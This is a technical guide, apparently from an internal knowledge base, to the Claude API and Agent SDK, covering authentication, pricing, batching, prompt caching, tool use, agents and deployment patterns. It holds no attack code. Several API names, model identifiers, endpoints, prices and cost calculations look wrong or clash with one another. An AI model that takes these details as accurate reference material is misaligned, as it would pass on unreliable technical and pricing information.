Claude API & Agent SDK
The Claude API is a REST interface for programmatic access to Claude models; the Agent SDK (Python/TypeScript) provides high-level abstractions for building autonomous AI agents with tool use, sessions, subagents, and cost tracking -- enabling production deployments from internal knowledge assistants to full-stack agentic workflows.
The Claude API is a REST interface for programmatic access to Claude models; the Agent SDK (Python/TypeScript) provides high-level abstractions for building autonomous AI agents with tool use, sessions, subagents, and cost tracking — enabling production deployments from internal knowledge assistants to full-stack agentic workflows.
Claude API Fundamentals
The Claude API at api.anthropic.com exposes Claude models via REST, enabling integration into any application, service, or agent framework.
Authentication
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import anthropic
# 1. Direct API key (from console.anthropic.com)
client = anthropic.Anthropic(api_key="sk-ant-...")
# 2. Via environment variable
client = anthropic.Anthropic() # reads ANTHROPIC_API_KEY env var
# 3. AWS Bedrock (enterprise customers)
import os
os.environ["CLAUDE_CODE_USE_BEDROCK"] = "true"
client = anthropic.Anthropic()
# 4. Google Vertex AI
client = anthropic.Anthropic(
api_key="", # empty
base_url="https://us-central1-aiplatform.googleapis.com/v1beta1/projects/{PROJECT_ID}/locations/us-central1/endpoints/openapi"
)
# 5. Azure AI Foundry
client = anthropic.Anthropic(
api_key=os.environ["AZURE_API_KEY"],
base_url="https://{RESOURCE_NAME}.openai.azure.com/v1"
)
Security best practice: Store API keys in environment variables, not hardcoded. Use IAM roles (AWS Bedrock) for production deployments.
Basic Request/Response
1
2
3
4
5
6
7
8
9
10
11
12
message = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1024,
messages=[
{
"role": "user",
"content": "Write a Python function that calculates fibonacci(n)"
}
]
)
print(message.content[0].text)
Response structure:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
"id": "msg_...",
"type": "message",
"role": "assistant",
"content": [
{
"type": "text",
"text": "def fibonacci(n):\n ..."
}
],
"model": "claude-sonnet-4-20250514",
"stop_reason": "end_turn",
"stop_sequence": null,
"usage": {
"input_tokens": 15,
"output_tokens": 87
}
}
Token Pricing & Cost Optimization
Current Pricing (as of Feb 2025)
| Model | Input (per MTok) | Output (per MTok) | Batch Input | Batch Output | Context | Notes |
|---|---|---|---|---|---|---|
| Claude Opus 4.6 | $5.00 | $25.00 | $2.50 | $12.50 | 1M | Extended thinking (+40-60% tokens) |
| Claude Sonnet 4.6 | $3.00 | $15.00 | $1.50 | $7.50 | 1M | Recommended for production |
| Claude Haiku 4.5 | $1.00 | $5.00 | $0.50 | $2.50 | 200k | Cost-optimized, fast |
Example monthly cost (Sonnet, 1M input + 500k output tokens):
- Pay-as-you-go: (1M × $3) + (500k × $15) = $10.50
- Batch API: (1M × $1.50) + (500k × $7.50) = $5.25
- Savings: 50%
Token Accounting
Overhead per API call:
- Base overhead: ~10 tokens
- Tool use: +346 tokens for Opus/Sonnet, +264 for Haiku (system setup)
- Extended thinking: +3-4x total tokens when enabled
Practical example:
1
2
3
4
5
6
7
8
9
10
# Simple query
message = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=100,
messages=[{"role": "user", "content": "What is 2+2?"}]
)
# Cost: 14 input tokens (question) × $3/MTok = $0.000042
# Plus: 7 output tokens (answer) × $15/MTok = $0.000105
# Total: ~$0.00015 per call
Cost Optimization Strategies
1. Batch API (-50%)
Process multiple requests asynchronously (overnight, off-peak) at half price:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import anthropic
import json
import time
client = anthropic.Anthropic()
# Prepare batch requests
batch_requests = [
{
"custom_id": "request_1",
"params": {
"model": "claude-sonnet-4-20250514",
"max_tokens": 1024,
"messages": [{"role": "user", "content": "Summarize this document..."}],
},
},
# ... 100s more requests
]
# Submit batch
batch = client.beta.batch.requests.create(
requests=batch_requests
)
print(f"Batch {batch.id} submitted. Processing...")
# Poll for completion (can take hours)
while True:
status = client.beta.batch.requests.retrieve(batch.id)
print(f"Status: {status.processing_count} processing, {status.succeeded_count} done")
if status.processing_count == 0:
break
time.sleep(30) # Check every 30 seconds
# Fetch results
results = client.beta.batch.requests.list(batch.id)
for result in results:
print(f"{result.custom_id}: {result.result.message.content[0].text}")
When to use:
- Overnight document processing (contracts, reports)
- Bulk data analysis (10k+ documents)
- Weekly/monthly batch jobs
- Not for real-time user queries (unacceptable latency)
2. Prompt Caching (0.1x hit cost)
Cache repeated context so reads cost 1/10th of writes:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# First request: Create cache (1.25x write cost)
message = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1024,
system=[
{
"type": "text",
"text": """You are an expert code reviewer.
Analyze code for: performance, security, maintainability, testing."""
},
{
"type": "text",
"text": "Here's the entire codebase:\n" + open("codebase.txt").read(),
"cache_control": {"type": "ephemeral"}
}
],
messages=[{"role": "user", "content": "Review src/auth.ts"}]
)
# Subsequent requests (5 min window): Cache hit (0.1x read cost)
for file in ["src/api.ts", "src/db.ts", "src/middleware.ts"]:
message = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1024,
system=[
{
"type": "text",
"text": """You are an expert code reviewer.
Analyze code for: performance, security, maintainability, testing."""
},
{
"type": "text",
"text": "Here's the entire codebase:\n" + open("codebase.txt").read(),
"cache_control": {"type": "ephemeral"}
}
],
messages=[{"role": "user", "content": f"Review {file}"}]
)
Economics:
- Codebase: 500k tokens
- First request: 500k × $3 × 1.25 = $1.875 (write to cache)
- Requests 2-5: 500k × $3 × 0.1 = $0.15 each (cache hit)
- Total: $1.875 + 4×$0.15 = $2.475 vs. $7.50 without cache
- Savings: 67%
Break-even: Typically after 5-10 reads of cached content.
3. US-Only Data Residency (+10%)
Opt-in: data stays in US, never exported internationally.
1
2
3
4
client = anthropic.Anthropic(
api_key="sk-ant-...",
default_headers={"anthropic-beta": "data-residency-us"}
)
Cost: +10% (Sonnet input becomes $3.30)
When needed: Healthcare, PII, financial data, compliance-sensitive workflows.
4. Smart Model Selection
Heuristic: Start with Sonnet, profile usage, migrate 30-40% to Haiku.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Adaptive model selection based on task complexity
def choose_model(task_complexity: str) -> str:
"""Select appropriate model for task."""
if task_complexity == "simple":
return "claude-haiku-4-20250514" # 1x cost
elif task_complexity == "medium":
return "claude-sonnet-4-20250514" # 3x cost
else: # complex reasoning, extended thinking
return "claude-opus-4-20250514" # 5x cost
# Usage
for task in tasks:
model = choose_model(task["complexity"])
# ... make API call with model
Tool Use (Function Calling)
Tools enable Claude to call functions in your application, enabling agentic loops:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# 1. Define tools
tools = [
{
"name": "calculate_investment_return",
"description": "Calculate ROI for an investment",
"input_schema": {
"type": "object",
"properties": {
"principal": {"type": "number", "description": "Initial investment"},
"rate": {"type": "number", "description": "Annual interest rate (%)"},
"years": {"type": "integer", "description": "Investment period"},
},
"required": ["principal", "rate", "years"],
},
},
{
"name": "fetch_stock_price",
"description": "Get current stock price",
"input_schema": {
"type": "object",
"properties": {
"ticker": {"type": "string", "description": "Stock ticker (e.g., AAPL)"},
},
"required": ["ticker"],
},
},
]
# 2. Make request with tools
messages = [
{
"role": "user",
"content": "If I invest $10k at 7% for 5 years, what's my return? Also fetch AAPL stock price."
}
]
response = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1024,
tools=tools,
messages=messages,
)
# 3. Process tool calls in agentic loop
while response.stop_reason == "tool_use":
# Extract tool calls
tool_calls = [block for block in response.content if block.type == "tool_use"]
# Execute tools
tool_results = []
for tool_call in tool_calls:
if tool_call.name == "calculate_investment_return":
principal = tool_call.input["principal"]
rate = tool_call.input["rate"]
years = tool_call.input["years"]
result = principal * ((1 + rate/100) ** years)
tool_results.append({
"type": "tool_result",
"tool_use_id": tool_call.id,
"content": f"Return: ${result:.2f}",
})
elif tool_call.name == "fetch_stock_price":
ticker = tool_call.input["ticker"]
# Simulate fetch (real: call API)
price = 150.25 # Mock data
tool_results.append({
"type": "tool_result",
"tool_use_id": tool_call.id,
"content": f"{ticker} price: ${price}",
})
# Continue conversation with tool results
messages.append({"role": "assistant", "content": response.content})
messages.append({"role": "user", "content": tool_results})
response = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1024,
tools=tools,
messages=messages,
)
# 4. Extract final answer
final_answer = next(
(block.text for block in response.content if hasattr(block, "text")),
None
)
print(final_answer)
Output:
1
2
3
If you invest $10,000 at 7% annual interest for 5 years, your investment will grow to approximately $14,025.52, representing a gain of about $4,025.52 or 40.26%.
AAPL is currently trading at $150.25.
Agent SDK (High-Level Abstractions)
The Agent SDK wraps the API with higher-level tools for building autonomous agents.
Basic Agent
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from anthropic import Agent
from anthropic.tools import bash, read_file, write_file, grep
# Create agent with built-in tools
agent = Agent(
model="claude-sonnet-4-20250514",
tools=[bash, read_file, write_file, grep],
)
# Run autonomous task
result = agent.run("Write a Python test file for src/auth.ts tests")
print(result)
# Agent autonomously:
# 1. Read src/auth.ts (understand what to test)
# 2. Generate test file content
# 3. Write to src/auth.test.ts
# 4. Run tests to verify
Subagents (Parallel Execution)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from anthropic import Agent, create_subagent
main_agent = Agent(
model="claude-sonnet-4-20250514",
system="You orchestrate feature development across teams.",
)
# Create specialized subagents
frontend_agent = create_subagent(
"frontend",
system="You're an expert React developer.",
model="claude-sonnet-4-20250514",
)
backend_agent = create_subagent(
"backend",
system="You're an expert backend engineer.",
model="claude-sonnet-4-20250514",
)
test_agent = create_subagent(
"testing",
system="You're a QA engineer focused on comprehensive testing.",
model="claude-haiku-4-20250514", # Lower cost
)
# Orchestrate
result = main_agent.run("""
Implement a user authentication feature:
1. Frontend agent: Build login UI component
2. Backend agent: Build auth API endpoints
3. Test agent: Write unit and integration tests
All run in parallel, then integrate results.
""", subagents=[frontend_agent, backend_agent, test_agent])
Sessions (Persistent Context)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from anthropic import Agent, Session
# Create persistent session
session = Session(
model="claude-sonnet-4-20250514",
agent_system="You are a code review expert for Python projects."
)
# First interaction: Set context
session.run("Our project uses async/await patterns. Review all code with this in mind.")
# Second interaction: Leverages context from first
session.run("Review src/database.py for best practices")
# Third interaction: Still has context
session.run("What patterns are we missing?")
# Save session for later
session.save("code_review_session.pkl")
# Load and resume
loaded_session = Session.load("code_review_session.pkl")
loaded_session.run("Now review src/api.py")
Cost Tracking
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from anthropic import Agent
import json
agent = Agent(
model="claude-sonnet-4-20250514",
track_cost=True,
)
# Run task
result = agent.run("Analyze this codebase for performance issues", tools=[...])
# Extract costs
print(json.dumps(agent.cost_tracking, indent=2))
# Output:
# {
# "total_input_tokens": 2540,
# "total_output_tokens": 1235,
# "total_cost": "$0.1048",
# "steps": [
# {"step": 1, "tool": "read_file", "input_tokens": 340, "output_tokens": 125, "cost": "$0.0105"},
# ...
# ]
# }
Multimodal Input (Vision)
Claude supports image input:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import base64
import os
# Load image
with open("screenshot.png", "rb") as img_file:
image_data = base64.standard_b64encode(img_file.read()).decode("utf-8")
message = client.messages.create(
model="claude-sonnet-4-20250514",
max_tokens=1024,
messages=[
{
"role": "user",
"content": [
{
"type": "image",
"source": {
"type": "base64",
"media_type": "image/png",
"data": image_data,
},
},
{
"type": "text",
"text": "Describe the UI layout and identify potential UX improvements.",
},
],
}
],
)
print(message.content[0].text)
Use cases:
- Screenshot analysis (UX review)
- Document OCR (extract tables, text from PDFs)
- Diagram interpretation (architecture diagrams, flow charts)
- Product screenshot comparison (competitive analysis)
Streaming (Real-Time Output)
For user-facing applications, stream responses as they arrive:
1
2
3
4
5
6
7
8
9
10
# Streaming text and tool use
with client.messages.stream(
model="claude-sonnet-4-20250514",
max_tokens=1024,
messages=[{"role": "user", "content": "Write a poem about AI"}],
) as stream:
for text in stream.text_stream:
print(text, end="", flush=True) # Print as chunks arrive
print(f"\nTotal tokens: {stream.get_final_message().usage.output_tokens}")
Benefits:
- Lower perceived latency (user sees output immediately)
- Better UX (don’t wait for full response)
- Terminal-friendly (real-time printing)
Production Deployment Patterns
Pattern 1: Internal Knowledge Assistant
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from anthropic import Agent
from anthropic.tools import read_file, bash, grep
class KnowledgeAssistant:
def __init__(self, docs_dir: str):
self.docs_dir = docs_dir
self.agent = Agent(
model="claude-sonnet-4-20250514",
system=f"""You're the company's internal knowledge assistant.
Help employees find answers in {docs_dir}.
Always link to the source document.""",
tools=[read_file, grep],
)
def answer_question(self, question: str) -> str:
"""Answer questions about company knowledge base."""
result = self.agent.run(question)
return result
# Usage
assistant = KnowledgeAssistant("/internal/docs")
answer = assistant.answer_question("How do we handle multi-tenant isolation?")
print(answer)
Pattern 2: Autonomous Agent with Safeguards
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from anthropic import Agent
from anthropic.tools import bash
class SafeAgent:
def __init__(self, allowed_commands: list):
self.allowed_commands = allowed_commands
self.agent = Agent(
model="claude-sonnet-4-20250514",
tools=[self._safe_bash],
)
def _safe_bash(self, command: str) -> str:
"""Only allow whitelisted commands."""
if not any(cmd in command for cmd in self.allowed_commands):
return f"Command not allowed: {command}"
return bash(command)
def run_task(self, task: str) -> str:
"""Run task with command safeguards."""
return self.agent.run(task)
# Usage
agent = SafeAgent(allowed_commands=["npm test", "npm run lint", "git status"])
result = agent.run_task("Run tests and report results")
Pattern 3: Cost-Optimized Batch Processing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from anthropic import Agent
import json
def process_documents(documents: list[str]) -> list[str]:
"""Process large document set with Batch API + Haiku."""
# Prepare batch requests
requests = []
for i, doc in enumerate(documents):
requests.append({
"custom_id": f"doc_{i}",
"params": {
"model": "claude-haiku-4-20250514", # Low cost
"max_tokens": 256,
"messages": [
{"role": "user", "content": f"Summarize:\n{doc}"}
],
},
})
# Submit batch
client = anthropic.Anthropic()
batch = client.beta.batch.requests.create(requests=requests)
# Wait for completion and collect results
# (polling code omitted for brevity)
results = [r.result.message.content[0].text for r in batch_results]
return results
# Cost: 100k documents × $1 per input token = $100 with Haiku
# vs. Sonnet would be $300
Key Properties
| Property | Value | Notes |
|---|---|---|
| Request latency | 2-10 seconds (median) | Depends on model, complexity, tool use |
| Max tokens per request | 4M (theoretical) | Practical limit: 1M for context, 128k for output |
| Tool use overhead | 264-346 tokens | System setup cost per request with tools |
| Batch processing time | 5 min - 24 hours | Depends on queue; usually completes in 5-30 min |
| Prompt caching duration | 5 minutes | TTL for cached content |
| Streaming latency | 200-500ms (time-to-first-token) | Faster than non-streaming |
| RPS (requests per second) | 100+ (standard), 1000+ (enterprise) | Rate limits enforced per account |
| Uptime SLA | 99.9% (implied) | No explicit SLA published; empirically reliable |
Real-World Implementation Example
Scenario: Engineering Leader building an internal incident response agent
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from anthropic import Agent, create_subagent
from anthropic.tools import bash, read_file, grep
def build_incident_response_agent():
"""Build autonomous incident response system."""
main_agent = Agent(
model="claude-sonnet-4-20250514",
system="You are an incident response expert. Triage, analyze, and remediate.",
track_cost=True,
)
# Specialized subagents
log_analyzer = create_subagent(
"logs",
system="You're an expert at analyzing application logs.",
model="claude-haiku-4-20250514",
)
db_expert = create_subagent(
"database",
system="You're a database expert. Analyze queries, locks, and performance.",
model="claude-haiku-4-20250514",
)
# Orchestrate incident response
def handle_incident(error_summary: str):
"""Respond to incident autonomously."""
# Main agent coordinates
result = main_agent.run(f"""
Production incident: {error_summary}
Coordinate response:
1. Log analyzer: Parse error logs, identify root cause
2. DB expert: Check database queries and locks
3. Recommend fix and verify with tests
Subagents: {[log_analyzer, db_expert]}
""", subagents=[log_analyzer, db_expert])
print(f"Incident resolved. Cost: {main_agent.cost_tracking['total_cost']}")
return result
return handle_incident
# Usage
handler = build_incident_response_agent()
result = handler("Payment API returning 500 errors. Last 100 errors in logs/error.log")
When to Use API vs. Alternatives
| Use Case | Claude API | Claude.ai | Claude Code | Claude Cowork |
|---|---|---|---|---|
| Production application | Yes | No | No | No |
| Internal knowledge bot | Yes | Limited users | Engineers only | Yes |
| Autonomous agent | Yes | No | Yes (coding) | Yes (ops) |
| Cost-sensitive batch | Yes (Batch API) | No | No | No |
| Interactive brainstorm | No | Yes | No | No |
References
Official Documentation:
Guides & Tutorials:
- “Building Production Agents” (best practices, safeguards)
- “Cost Optimization Strategies” (batch, caching, model selection)
- “Streaming for User-Facing Apps”
Video Resources:
- Anthropic: “Claude API Deep Dive” (40 min technical overview)
- “Building an Agent from Scratch” (hands-on tutorial, 30 min)
- ByteByteGo: “Prompt Caching Economics” (cost analysis)
Community & Code:
- Claude SDK Repository
- Example projects: customer support bot, code reviewer, data analyzer
- Anthropic Discord: #api-help for questions
| Last Updated: Feb 2025 | Author: Principal Engineer, knowledge vault |